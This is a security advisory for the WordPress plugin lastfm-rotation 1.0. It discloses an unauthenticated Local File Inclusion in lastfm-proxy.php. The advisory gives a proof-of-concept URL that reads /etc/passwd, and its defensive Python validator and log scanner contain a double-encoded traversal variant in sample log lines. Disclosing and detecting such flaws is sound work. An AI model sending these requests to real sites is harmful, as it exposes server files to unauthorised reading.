wp-plugin : lastfm-rotation – Local File Inclusion

Plugin Details

Plugin Name : lastfm-rotation

Affected Version : 1.0 (and most probably lower versions, if any)

Vulnerability : Local File Inclusion

Identified by : Anant Shrivastava

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd

Vulnerable Parameter : snode
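The advisory gives only the PoC URL, so the two things a practitioner wants next are the check that should have been applied to snode and a way to spot requests like the PoC in web server logs. The Python below is an added example, not the plugin's code and not the researcher's: it assumes snode is meant to be a plain cache identifier resolved under a fixed cache directory (the directory path and the identifier format are assumptions), and it runs the same containment check as a detector over constructed Apache-style access-log lines.

```python
"""Input validation and log detection for the lastfm-proxy.php ``snode``
Local File Inclusion described above.

Added example, not code from the lastfm-rotation plugin. Assumptions:
  * a legitimate ``snode`` is a plain identifier (letters, digits, dot,
    dash, underscore) that names a file beneath a fixed cache directory;
  * the sample log lines are constructed in Apache combined log format.
"""
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed shape of a legitimate snode value (assumption, not from the plugin).
SAFE_SNODE = re.compile(r"^[A-Za-z0-9_.-]+$")

# Apache combined log format: ip ident user [time] "METHOD url proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)


def is_safe_snode(value: str, base_dir: str = "/var/www/wp-cache") -> bool:
    """Return True only if ``value`` is a simple identifier whose resolved
    path stays inside ``base_dir``. Absolute paths, traversal segments and
    anything containing '/' or ':' fail the allowlist; the realpath
    containment check is a second, independent guard."""
    if not value or not SAFE_SNODE.fullmatch(value) or ".." in value:
        return False
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, value))
    return target == base or target.startswith(base + os.sep)


def snode_from_request(url: str):
    """Extract the snode parameter from a request URL aimed at lastfm-proxy.php.
    parse_qs decodes one layer of percent-encoding; the extra unquote also
    catches double-encoded values so the detector sees what PHP would see."""
    parts = urlsplit(url)
    if not parts.path.endswith("/lastfm-proxy.php"):
        return None
    values = parse_qs(parts.query).get("snode")
    return unquote(values[0]) if values else None


def scan_access_log(lines):
    """Return (client_ip, decoded_snode, status) for every request whose
    snode value fails is_safe_snode(); other lines are ignored."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        snode = snode_from_request(m.group("url"))
        if snode is None or is_safe_snode(snode):
            continue
        findings.append((m.group("ip"), snode, int(m.group("status"))))
    return findings


# Constructed sample log lines: one benign request, the advisory's PoC,
# a double-encoded traversal variant of it, and an unrelated asset request.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2014:10:01:02 +0000] "GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=weekly_albums HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [28/May/2014:10:01:07 +0000] "GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=/etc/passwd HTTP/1.1" 200 1843 "-" "curl/7.35.0"',
    '203.0.113.9 - - [28/May/2014:10:01:09 +0000] "GET /wp-content/plugins/lastfm-rotation/lastfm-proxy.php?snode=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1843 "-" "curl/7.35.0"',
    '198.51.100.2 - - [28/May/2014:10:02:00 +0000] "GET /wp-content/plugins/lastfm-rotation/style.css HTTP/1.1" 200 220 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} requested snode={value!r} (HTTP {status})")
```

The same is_safe_snode() logic is what the proxy script itself should apply before touching the filesystem: an allowlist on the identifier plus a realpath containment check, rather than trying to strip known-bad strings. A 200 status on a flagged line is the signal that the inclusion likely succeeded and the response should be treated as a disclosure.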

Disclosure Timeline

Vendor Contacted : 2014-02-19

Plugin Status : Closed

Public Disclosure : May 28, 2014

CVE Number : Not assigned yet

Plugin Description :

Last.fm Rotation will display the covers for the albums you have had in heavy rotation over the last week. It uses
the Last.fm API via AJAX to fetch the data and includes a functional (albeit crude) caching mechanism to improve
performance. You can make sure Last.fm gets updated with music played from different sources by utilizing one of the many
scrobbler plugins available. For example, I use Rhapsody for music streaming, and therefore decided to use Rhobbler
to make sure that Last.fm has a complete profile on my listening habits. Please send feedback, enhancement requests,
bug details or any questions about installation to dfederighi@yahoo.com
